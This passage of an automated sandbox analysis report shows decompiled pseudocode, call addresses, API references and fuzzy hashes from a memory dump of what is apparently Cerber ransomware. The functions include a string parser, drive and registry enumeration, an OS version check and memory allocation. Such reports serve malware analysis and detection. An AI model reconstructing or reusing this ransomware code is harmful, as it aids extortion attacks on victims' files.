									if(__eflags == 0) {
										L18:
										_t54 = _a4;
										_t37 = E0040340D(_a12, __eflags, _t54, _t60);
										 *((intOrPtr*)(_t54 + 0x14)) = 2;
										goto L19;
									} else {
										__eflags = _t35 - 0x30;
										if(_t35 < 0x30) {
											L13:
											__eflags = _t35 - 0x5b;
											if(__eflags != 0) {
												__eflags = _t35 - 0x7b;
												if(__eflags == 0) {
													_t55 = _a4;
													_t37 = E0040383F(_a12, __eflags, _t55, _t60); // executed
													 *(_t55 + 0x14) = _t45;
													goto L19;
												} else {
													_t60 = 0;
												}
											} else {
												_t47 = _a4;
												_t37 = E00403765(_a12, __eflags, _t47, _t60);
												 *(_t47 + 0x14) = _t53;
												L19:
												goto L20;
											}
										} else {
											__eflags = _t35 - 0x39;
											if(__eflags <= 0) {
												goto L18;
											} else {
												goto L13;
											}
										}
									}
								} else {
									_t56 = _a4;
									_t37 = E004034CB(__eflags, _t56, _t60, _a12); // executed
									 *((intOrPtr*)(_t56 + 0x14)) = 3;
									goto L20;
								}
							} else {
								_t48 = _a4;
								 *(_t48 + 0x20) = 1;
								_t40 = _t53;
								goto L5;
							}
						} else {
							_t48 = _a4;
							 *(_t48 + 0x20) = _t32;
							_t40 = 5;
							L5:
							_t37 = E004033CD(_t40, _t60, _a12, __eflags);
							 *(_t48 + 0x14) =  *(_t48 + 0x14) & 0x00000000;
							L20:
							_t60 = _t37;
						}
					} else {
						_t60 = E004033CD(_t53, _t60, _a12, _t69);
						 *((intOrPtr*)(_a4 + 0x14)) = 1;
					}
				}
				return _t60;
			}

0x0040398d
0x00403994
0x00403995
0x00403996
0x004039ac
0x004039b3
0x004039cf
0x004039d5
0x004039d7
0x004039f9
0x00403a10
0x00403a16
0x00403a18
0x00403a52
0x00403a54
0x00403a61
0x00403a63
0x00403a65
0x00403a80
0x00403a82
0x00403abc
0x00403abc
0x00403ac4
0x00403ac9
0x00000000
0x00403a84
0x00403a84
0x00403a86
0x00403a8c
0x00403a8c
0x00403a8e
0x00403aa2
0x00403aa4
0x00403aaa
0x00403ab2
0x00403ab7
0x00000000
0x00403aa6
0x00403aa6
0x00403aa6
0x00403a90
0x00403a90
0x00403a98
0x00403a9d
0x00403ad0
0x00000000
0x00403ad1
0x00403a88
0x00403a88
0x00403a8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a8a
0x00403a86
0x00403a67
0x00403a6a
0x00403a6f
0x00403a77
0x00000000
0x00403a77
0x00403a56
0x00403a56
0x00403a59
0x00403a5d
0x00000000
0x00403a5d
0x00403a1a
0x00403a1a
0x00403a1f
0x00403a22
0x00403a23
0x00403a28
0x00403a2d
0x00403ad2
0x00403ad2
0x00403ad2
0x004039d9
0x004039e5
0x004039ea
0x004039ea
0x004039d7
0x00403ada

APIs

Part of subcall function 004033A7: StrSpnA.SHLWAPI(?,?,00000004,004039AC,00000000,0040D2B8,00000004,EED5962F,?,00000000,?,00403AF6,00000000,?,?,00000000), ref: 004033AF

StrCmpNIA.SHLWAPI(00000000,00000000,?,?,00000004,?,?,?,?,?,00000000,000000C8), ref: 004039CF
StrCmpNIA.SHLWAPI(00000000,00000000,?,00000005,?,?,?,00000004,?,?,?,?,?,00000000,000000C8), ref: 00403A10

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2629cd729c0c5cb705942234141dadd55e154167e403ab8f8840aa9260b1430
Instruction ID: bc9afb23272d53494b0115821da1e55680acf016d7d4a51e959fbc0468c80e88
Opcode Fuzzy Hash: f2629cd729c0c5cb705942234141dadd55e154167e403ab8f8840aa9260b1430
Instruction Fuzzy Hash: 2B310571700204ABCB209E559C45EAB3F6CEB46765F15003BFC85B7381D378EA428BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABCC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040ABCC(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v16;
				void* _v52;
				struct _MEMORYSTATUSEX _v80;
				intOrPtr _v152;
				char _v160;
				void* __ebx;
				void* __esi;
				void* _t12;
				void* _t14;
				void* _t19;
				void* _t23;
				void* _t30;
				void* _t31;
				void* _t32;

				_t30 = __edx;
				 *0x42fa68 = 0;
				 *0x42fa6c = 0; // executed
				_t12 = E0040A0A4(); // executed
				_t31 = _t12;
				_t32 = 0;
				do {
					_t14 = E0040A892(_t31,  &_v16); // executed
					if(_t14 >= 2 && (_t14 <= 3 || _t14 == 6)) {
						_t23 = E0040AAFB(0, _t30, _t32, _a4,  &_v16); // executed
						 *0x42fa68 =  *0x42fa68 + _t23;
						asm("adc [0x42fa6c], edx");
					}
					_t32 = _t32 + 1;
				} while (_t32 <= 0x19);
				_v80.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v80); // executed
				 *0x42fa68 =  *0x42fa68 - _v80.ullTotalVirtual;
				asm("sbb [0x42fa6c], eax");
				_t19 =  *0x40e8d8(4, 0, 0,  &_v160, 0x4c); // executed
				if(_t19 >= 0 && _v152 != 0) {
					 *0x42fa68 =  *0x42fa68 - _v80.ullTotalPhys;
					asm("sbb [0x42fa6c], eax");
					return _v80.ullAvailPhys;
				}
				return _t19;
			}

0x0040abcc
0x0040abda
0x0040abe0
0x0040abe6
0x0040abeb
0x0040abed
0x0040abef
0x0040abf6
0x0040ac00
0x0040ac13
0x0040ac18
0x0040ac20
0x0040ac20
0x0040ac26
0x0040ac27
0x0040ac30
0x0040ac37
0x0040ac40
0x0040ac4b
0x0040ac5c
0x0040ac64
0x0040ac71
0x0040ac7a
0x00000000
0x0040ac7a
0x0040ac84

APIs

Part of subcall function 0040A0A4: GetLogicalDrives.KERNEL32 ref: 0040A0AD
Part of subcall function 0040A0A4: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
Part of subcall function 0040A0A4: RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
Part of subcall function 0040A0A4: RegCloseKey.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138

Part of subcall function 0040A892: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040A8D4

GlobalMemoryStatusEx.KERNEL32(?,00000000,00000000,00000000), ref: 0040AC37

Strings

@, xrefs: 0040AC30

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseDrivesGlobalLogicalMemoryOpenQueryStatusValuelstrcpy
String ID: @
API String ID: 131812180-2766056989
Opcode ID: 8b14cefcd5f0184461d019f75121066f0c47cdd9a79100fc96c2c492249fe9ef
Instruction ID: dff415d2ceaf4e522acc9e0bd46ad76a6cd1046b5fef115d2c623fad209be056
Opcode Fuzzy Hash: 8b14cefcd5f0184461d019f75121066f0c47cdd9a79100fc96c2c492249fe9ef
Instruction Fuzzy Hash: 88111272A042189FFB20DBA9ED81A9D77F8EB04714F90407BE504E2191E6349A5ACF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00406598 Relevance: 3.1, APIs: 2, Instructions: 100
sleepCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00406598(char __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t10;
				char _t16;
				char _t24;
				void* _t37;
				void* _t42;
				char _t48;
				void* _t50;

				_t50 = __esi;
				_t46 = __edx;
				_t40 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t48 = __eax; // executed
				_t10 = E0040810D(__edx, __eax, __eflags); // executed
				_t37 = _t10;
				if( *0x43072c >= 0xa) {
					Sleep(0x2710); // executed
				}
				if(_t37 != 0) {
					E0040767A(_t46, _t48, 1);
					E004026BF(_t37);
					_push(_t48);
					__eflags = E00409C8E(_t40, _t46, __eflags);
					if(__eflags != 0) {
						_t16 = E0040A8DF(_t40, _t46, __eflags, _t48,  &_v8,  &_v12); // executed
						__eflags = _t16;
						if(_t16 != 0) {
							_t38 = _t48;
							E00402438(_t48, _t46, _v8);
							E0040A6AC(_v12);
							E004083D7(_t48, _t46, _t48, _t50, __eflags);
							__eflags =  *0x42f79f;
							_t42 = _t48;
							if(__eflags != 0) {
								_t24 = E0040AA30(_t38, _t42, _t46, __eflags, _t48,  &_v12,  &_v8);
								__eflags = _t24;
								if(_t24 != 0) {
									E00402438(_t38, _t46, _v12);
									E0040A6AC(_v8);
								}
							}
						} else {
							_push(E00405905(0x40d3d0, 0x19, 0x41e9377d));
							_push(_t48);
							E00402B21(_t37, _t46, _t48, _t50);
							E0040767A(_t46, _t48, 0);
						}
					} else {
						_push(E00405905(0x40d3b4, 0x18, 0x5f6f2f69));
						_push(_t48);
						E00402B21(_t37, _t46, _t48, _t50);
					}
				} else {
					_push(E00408107());
					_push(E00405905(0x40d3a4, 0xf, 0x7b772ff7));
					_push(_t48);
					E00402B21(_t37, _t46, _t48, _t50);
				}
				return SetEvent( *0x42f834);
			}

0x00406598
0x00406598
0x00406598
0x0040659b
0x0040659c
0x0040659f
0x004065a1
0x004065ad
0x004065af
0x004065b6
0x004065b6
0x004065be
0x004065ec
0x004065f1
0x004065f6
0x004065ff
0x00406601
0x0040662e
0x00406636
0x00406638
0x00406665
0x00406667
0x00406670
0x00406676
0x0040667b
0x00406682
0x00406683
0x0040668e
0x00406696
0x00406698
0x0040669d
0x004066a6
0x004066a6
0x00406698
0x0040663a
0x0040664e
0x0040664f
0x00406650
0x00406658
0x0040665d
0x00406603
0x00406617
0x00406618
0x00406619
0x0040661f
0x004065c0
0x004065c5
0x004065da
0x004065db
0x004065dc
0x004065e1
0x004066ba

APIs

Sleep.KERNEL32(00002710,00000000,?,?,?,?,0040684C), ref: 004065B6

Part of subcall function 00409C8E: RtlInitializeCriticalSection.NTDLL(0042FAD4), ref: 00409C9A

SetEvent.KERNEL32(?,?,?,?,?,?,?,00000000,000000C8), ref: 004066B1

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CriticalEventInitializeSectionSleep
String ID:
API String ID: 1594292029-0
Opcode ID: 39012ffd0e3606cec16687bb55fc47e4506806c2c1cc8f1209055042ebba4129
Instruction ID: 818db32ef9ad872f8d9c7ac3a9d740fdf4ec65af7803892208c62983cd778a81
Opcode Fuzzy Hash: 39012ffd0e3606cec16687bb55fc47e4506806c2c1cc8f1209055042ebba4129
Instruction Fuzzy Hash: 1B2196B1900204BADA1177A1AD47EBF7728CF52718F55043FF801751C3EA7E592A592F

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB Relevance: 3.1, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004015BB(WCHAR* __eax, void* __edx, void* __edi, void* __ebp) {
				intOrPtr _v0;
				void* __ebx;
				void* __esi;
				WCHAR* _t4;
				signed int _t5;
				void* _t6;
				void* _t20;
				void* _t21;
				WCHAR* _t22;
				WCHAR* _t23;

				_t21 = __edi;
				_t20 = __edx;
				_t22 = __eax;
				_t4 = PathFindFileNameW(__eax);
				_push(_t22);
				if(_t4 == 0) {
					_t5 = 0;
				} else {
					_t5 = _t4 - _t22 >> 1;
				}
				_t6 = E00405933(_t5);
				_t16 = _t6;
				if(_t6 != 0) {
					_t23 = E00405E43(_t16);
					if(_t23 != 0) {
						if(StrStrIW(_t23, E0040591C( &E0040CF2C, 0xa, 0xac7ba272)) == 0) {
							_push(_t23);
							_push(E0040591C(0x40cf38, 0xb, 0xd0a6f472));
							_push(_v0);
							E00402B9B(_t16, _t20, _t21, _t23);
							E00401423(_t20, _v0, _t23); // executed
						}
						E00405463(_t23);
					}
					return E00405463(_t16);
				}
				return _t6;
			}

0x004015bb
0x004015bb
0x004015bd
0x004015c0
0x004015c6
0x004015c9
0x004015d1
0x004015cb
0x004015cd
0x004015cd
0x004015d3
0x004015d8
0x004015dd
0x004015e4
0x004015e8
0x00401608
0x0040160a
0x0040161f
0x00401620
0x00401624
0x00401631
0x00401637
0x00401638
0x00401638
0x00000000
0x0040163f
0x00401646

APIs

PathFindFileNameW.SHLWAPI(004017DA,0040183A,00000000,00401784,00000000,?,?,?,?,?,?,?,?,004017DA), ref: 004015C0
StrStrIW.SHLWAPI(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004017DA), ref: 00401600

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: FileFindNamePath
String ID:
API String ID: 1422272338-0
Opcode ID: 72c02309d72f7f62d16f642f1d0bd5ff56be63fb299d4d1816ba234e5f969f8e
Instruction ID: 6d1b098faf618f524d06ec00d72a205917cd9cbf5da5b16b4b33492abc688410
Opcode Fuzzy Hash: 72c02309d72f7f62d16f642f1d0bd5ff56be63fb299d4d1816ba234e5f969f8e
Instruction Fuzzy Hash: D7F0F972915A2177D6213B731C46F9F2548DF50765B080D3BF800B51D2EE7E8E1409EE

Uniqueness

Uniqueness Score: -1.00%

Function 00406128 Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406128(void* __ecx) {
				unsigned int _v44;
				signed short _v48;
				char _v56;
				signed int _t15;
				void* _t16;
				signed int _t21;
				int _t26;

				_t16 = __ecx;
				_t21 = 1;
				0x430728->dwOSVersionInfoSize = 0x11c;
				_t26 = GetVersionExW(0x430728);
				if(_t26 != 0) {
					L2:
					E004060A3(_t16, E00405905( &E0040D390, 0xc, 0x4f2d54ed),  &_v56); // executed
					 *0x43072c = _v48 >> 0x10;
					 *0x430730 = _v48 & 0x0000ffff;
					 *0x430734 = _v44 >> 0x10;
				} else {
					0x430728->dwOSVersionInfoSize = 0x114;
					_t15 = GetVersionExW(0x430728);
					asm("sbb esi, esi");
					_t21 =  ~( ~_t15);
					if(_t26 != 0) {
						goto L2;
					}
				}
				return _t21;
			}

0x00406128
0x00406138
0x00406139
0x00406149
0x0040614b
0x00406168
0x00406181
0x0040618c
0x00406195
0x004061a2
0x0040614d
0x0040614e
0x00406158
0x00406162
0x00406164
0x00406166
0x00000000
0x00000000
0x00406166
0x004061ac

APIs

GetVersionExW.KERNEL32(00430728,00000000,00000000), ref: 00406143
GetVersionExW.KERNEL32(00430728), ref: 00406158

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 0b5fa071f19932b3c7421659f37e716286c27b89e514a381f7eba67cec8d384c
Instruction ID: 0d92069c201c3664348ef7ec49be0af143c15c189a838557dcfb357f7670faaa
Opcode Fuzzy Hash: 0b5fa071f19932b3c7421659f37e716286c27b89e514a381f7eba67cec8d384c
Instruction Fuzzy Hash: 1D018675A012149BDB64ABADAC0599ABBECD748754B01223AF841F7291D77498048EE8

Uniqueness

Uniqueness Score: -1.00%

Function 0156FF30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0156FF9C

Strings

VirtualAlloc, xrefs: 0156FF81, 0156FF84

Memory Dump Source

Source File: 00000013.00000002.410711762.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1540000_Endermanch@Cerber5.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: f30858d0a422aae06dd199b9a003870d7df03182a4f3850dc3e6dcbbe834f4c4
Instruction ID: e4b12ef191822caf347ae53b591ad069fd30dd24b1dbb9398093cd7dad0db141
Opcode Fuzzy Hash: f30858d0a422aae06dd199b9a003870d7df03182a4f3850dc3e6dcbbe834f4c4
Instruction Fuzzy Hash: 3A01E160D082CEEAEB01D7E8D409BFFBFB55F25704F044098D6846B282D6BA575887F6

Uniqueness

Uniqueness Score: -1.00%

Function 00405594 Relevance: 3.0, APIs: 2, Instructions: 23
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405594(int __eax, char* __esi, WCHAR* _a4, int _a8) {
				int _t7;
				int _t8;
				char* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__eax == 0) {
					_t7 = lstrlenW(_a4);
				}
				_t8 = WideCharToMultiByte(0x4e3, 0x200, _a4, _t7, _t9, _a8, 0, 0); // executed
				if(_a8 != 0) {
					if(_t8 > _a8) {
						_t8 = 0;
					}
					_t9[_t8] = 0;
					return _t8;
				}
				return _t8;
			}

0x00405594
0x00405594
0x00405599
0x0040559e
0x0040559e
0x004055ba
0x004055c4
0x004055c9
0x004055cb
0x004055cb
0x004055cd
0x00000000
0x004055cd
0x004055d2

APIs

lstrlenW.KERNEL32(?,?,00405654,?,00000000,00000000,00000000,004038B6,00405752,00000000,?,00000001,?,?,0040373F,?), ref: 0040559E
WideCharToMultiByte.KERNEL32(000004E3,00000200,?,?,00000000,?,00000000,00000000,?,00405654,?,00000000,00000000,00000000,004038B6,00405752), ref: 004055BA

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWidelstrlen
String ID:
API String ID: 3109718747-0
Opcode ID: 5a2cac91100831fce62050e1f373267da19f6c5bce9454b864975e02df754112
Instruction ID: 629912970a630e42f43cef752591bf9dacf824b4a3be9ac7404a97a7c387281a
Opcode Fuzzy Hash: 5a2cac91100831fce62050e1f373267da19f6c5bce9454b864975e02df754112
Instruction Fuzzy Hash: 93E01A31140608BEEB315F91DC09F9B3FA9AB00714F608031BA18AD5E0D6B59990CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040560B Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040560B(int __eax, WCHAR* _a4, char _a8) {
				int _t4;
				void* _t6;
				char* _t10;

				_t4 = __eax;
				if(__eax == 0) {
					_t4 = lstrlenW(_a4) + 1;
				}
				_t3 =  &_a8; // 0x40373f, executed
				_t6 = E00405594( *_t3, _t10, _a4, _t4); // executed
				return _t6;
			}

0x0040560b
0x0040560d
0x00405619
0x00405619
0x0040561f
0x00405623
0x0040562a

APIs

lstrlenW.KERNEL32(?,00405678,?,?,00000000,00000000,004038B6,00405752,00000000,?,00000001,?,?,0040373F,?,?), ref: 00405613

Strings

?7@, xrefs: 0040561F

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: ?7@
API String ID: 1659193697-917346843
Opcode ID: a25e9545154fb78832ba4e914a0336995ac5df15bdb37131127fd86a27adcb8d
Instruction ID: 49fb12f7e632107375035d62afd38228e3be900719d9c00f5f4622b73e0a0b72
Opcode Fuzzy Hash: a25e9545154fb78832ba4e914a0336995ac5df15bdb37131127fd86a27adcb8d
Instruction Fuzzy Hash: 21C01270008301AFEA05AB10EC0182B7BA5FB80321B10083AF88AE45A4DB3A8C50AA0D

Uniqueness

Uniqueness Score: -1.00%

Function 004034CB Relevance: 2.7, APIs: 2, Instructions: 230
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004034CB(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				char* _v20;
				signed int _v24;
				signed int _v28;
				void* __edi;
				void* __esi;
				void* _t49;
				intOrPtr _t54;
				signed int _t59;
				signed int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				char* _t70;
				signed int _t72;
				char* _t77;
				int _t79;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int* _t88;
				signed int _t90;
				intOrPtr _t95;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				signed int _t100;
				char* _t104;
				signed int _t107;
				char* _t112;
				intOrPtr* _t113;
				void* _t115;
				void* _t116;

				_t49 = E00405905(0x40d2b8, 4, 0xeed5962f);
				_t88 = _a12;
				_t112 = E004033A7(_a8, _t88, _t49);
				_t116 = _t115 + 0x10;
				if(_t112 == 0 ||  *_t112 != 0x22) {
					L60:
					return _t112;
				} else {
					_t113 = _t112 + 1;
					 *_t88 =  *_t88 - 1;
					if( *_t88 != 0) {
						_v12 = _v12 & 0x00000000;
						__eflags =  *_t113;
						_t104 = _t113;
						_v20 = _t104;
						if( *_t113 == 0) {
							L16:
							_t107 = E004053BD(_t90);
							_v24 = _t107;
							__eflags = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								__eflags = _v12;
								if(__eflags <= 0) {
									L58:
									 *_t107 = 0;
									_t54 = E0040572A(__eflags, _v24, _t107 - _v24); // executed
									 *((intOrPtr*)(_a4 + 0x20)) = _t54;
									E00405463(_v24);
									__eflags = 1;
									_t112 = E004033CD(1, _v20, _t88, 1);
									L59:
									goto L60;
								}
								do {
									_t59 =  *_t113;
									__eflags = _t59 - 0x5c;
									if(_t59 == 0x5c) {
										_t113 = _t113 + 1;
										_t95 =  *_t113;
										_t61 = _t95 - 0x62;
										__eflags = _t61;
										if(_t61 == 0) {
											 *_t107 = 8;
											L55:
											_t107 = _t107 + 1;
											__eflags = _t107;
											goto L56;
										}
										_t63 = _t61 - 4;
										__eflags = _t63;
										if(_t63 == 0) {
											 *_t107 = 0xc;
											goto L55;
										}
										_t64 = _t63 - 8;
										__eflags = _t64;
										if(_t64 == 0) {
											 *_t107 = 0xa;
											goto L55;
										}
										_t65 = _t64 - 4;
										__eflags = _t65;
										if(_t65 == 0) {
											 *_t107 = 0xd;
											goto L55;
										}
										_t67 = _t65;
										__eflags = _t67;
										if(_t67 == 0) {
											 *_t107 = 9;
											goto L55;
										}
										__eflags = _t67 == 1;
										if(_t67 == 1) {
											_push( &_v16);
											_t70 = E00405905(0x40d2d0, 3, 0x2559b91d);
											_t19 = _t113 + 1; // 0x3
											_t72 = sscanf(_t19, _t70);
											_t116 = _t116 + 0x18;
											__eflags = _t72;
											if(_t72 == 0) {
												goto L56;
											}
											_t59 = _v16;
											_t113 = _t113 + 4;
											__eflags = _t59 - 0xdc00;
											if(_t59 < 0xdc00) {
												L32:
												__eflags = _t59;
												if(_t59 == 0) {
													goto L56;
												}
												__eflags = _t59 - 0xfe;
												if(_t59 == 0xfe) {
													L36:
													_t23 = _t59 - 0xd800; // -55296
													_t96 = _t23;
													__eflags = _t96 - 0x3ff;
													if(_t96 > 0x3ff) {
														L42:
														__eflags = _t59 - 0x80;
														if(_t59 >= 0x80) {
															__eflags = _t59 - 0x800;
															if(_t59 >= 0x800) {
																__eflags = _t59 - 0x10000;
																asm("sbb ecx, ecx");
																_t97 = _t96 + 4;
																__eflags = _t97;
															} else {
																_t97 = 2;
															}
														} else {
															_t97 = 1;
														}
														_t100 = _t97;
														__eflags = _t97 - 1;
														if(_t97 <= 1) {
															L49:
															_t35 = _t97 + 0x40fdb4; // 0x835ff57
															 *_t107 =  *_t35 | _t59;
															_t107 = _t107 + _t97;
															_v8 = _v8 + _t97;
															goto L56;
														} else {
															do {
																 *(_t107 + _t100 - 1) = _t59 & 0x0000003f | 0x00000080;
																_t59 = _v16 >> 6;
																_t100 = _t100 - 1;
																_v16 = _t59;
																__eflags = _t100 - 1;
															} while (_t100 > 1);
															goto L49;
														}
													}
													__eflags =  *(_t113 + 1) - 0x5c;
													if( *(_t113 + 1) != 0x5c) {
														goto L56;
													}
													__eflags =  *((char*)(_t113 + 2)) - 0x75;
													if( *((char*)(_t113 + 2)) != 0x75) {
														goto L56;
													}
													_push( &_v28);
													_t77 = E00405905(0x40d2d0, 3, 0x2559b91d);
													_t27 = _t113 + 3; // 0x1
													_t79 = sscanf(_t27, _t77);
													_t116 = _t116 + 0x18;
													__eflags = _t79;
													if(_t79 == 0) {
														goto L56;
													}
													_t99 = _v28;
													_t113 = _t113 + 6;
													__eflags = _t99 - 0xdc00 - 0x3ff;
													if(_t99 - 0xdc00 > 0x3ff) {
														goto L56;
													}
													_t96 = _t99 & 0x000003ff;
													_t59 = (_t99 & 0x000003bf | 0x00000040) << 0x0000000a | _t96;
													__eflags = _t59;
													_v16 = _t59;
													goto L42;
												}
												__eflags = _t59 - 0xff;
												if(_t59 == 0xff) {
													goto L36;
												}
												_v8 = _v8 + 2;
												goto L21;
											}
											__eflags = _t59 - 0xdfff;
											if(_t59 <= 0xdfff) {
												goto L56;
											}
											goto L32;
										}
										 *_t107 = _t95;
										goto L55;
									}
									L21:
									 *_t107 = _t59;
									goto L55;
									L56:
									_t113 = _t113 + 1;
									_v8 = _v8 + 1;
									__eflags = _v8 - _v12;
								} while (__eflags < 0);
								_t88 = _a12;
								goto L58;
							}
							_t112 = 0;
							goto L59;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							__eflags =  *_t104 - 0x22;
							if( *_t104 == 0x22) {
								goto L16;
							}
							_t85 =  *_t88;
							__eflags = _t85;
							if(_t85 == 0) {
								goto L16;
							}
							_t86 = _t85 - 1;
							_v12 = _v12 + 1;
							 *_t88 = _t86;
							_t90 =  *_t104;
							_t104 = _t104 + 1;
							_v20 = _t104;
							__eflags = _t90 - 0x5c;
							if(_t90 == 0x5c) {
								__eflags =  *_t104 - 0x75;
								if( *_t104 == 0x75) {
									_t104 = _t104 + 5;
									_v20 = _t104;
									__eflags = _t86 - 5;
									if(_t86 >= 5) {
										_t90 = 5;
									} else {
										_t90 = _t86;
									}
									_t87 = _t86 - _t90;
									_t11 =  &_v12;
									 *_t11 = _v12 + 2;
									__eflags =  *_t11;
								} else {
									_t104 = _t104 + 1;
									_v20 = _t104;
									_t87 = _t86 - 1;
								}
								 *_t88 = _t87;
							}
							__eflags =  *_t104;
							if( *_t104 != 0) {
								continue;
							} else {
								goto L16;
							}
						}
						goto L16;
					}
					_t112 = 0;
					goto L60;
				}
			}

0x004034df
0x004034e4
0x004034f2
0x004034f4
0x004034f9
0x0040375f
0x00403764
0x00403508
0x00403508
0x00403509
0x0040350b
0x00403514
0x00403518
0x0040351c
0x0040351e
0x00403521
0x0040356a
0x00403573
0x00403575
0x00403578
0x0040357a
0x00403583
0x00403587
0x0040358b
0x00403730
0x00403730
0x0040373a
0x00403747
0x0040374a
0x00403754
0x0040375c
0x0040375e
0x00000000
0x0040375e
0x00403596
0x00403596
0x00403598
0x0040359a
0x004035a3
0x004035a4
0x004035a9
0x004035a9
0x004035ac
0x00403719
0x0040371c
0x0040371c
0x0040371c
0x00000000
0x0040371c
0x004035b2
0x004035b2
0x004035b5
0x00403714
0x00000000
0x00403714
0x004035bb
0x004035bb
0x004035be
0x0040370f
0x00000000
0x0040370f
0x004035c4
0x004035c4
0x004035c7
0x0040370a
0x00000000
0x0040370a
0x004035ce
0x004035ce
0x004035cf
0x00403705
0x00000000
0x00403705
0x004035d5
0x004035d6
0x004035e2
0x004035ef
0x004035f8
0x004035fc
0x00403602
0x00403605
0x00403607
0x00000000
0x00000000
0x0040360d
0x00403610
0x00403613
0x00403618
0x00403625
0x00403625
0x00403627
0x00000000
0x00000000
0x0040362d
0x00403632
0x00403644
0x00403644
0x00403644
0x0040364a
0x0040364c
0x004036b4
0x004036b4
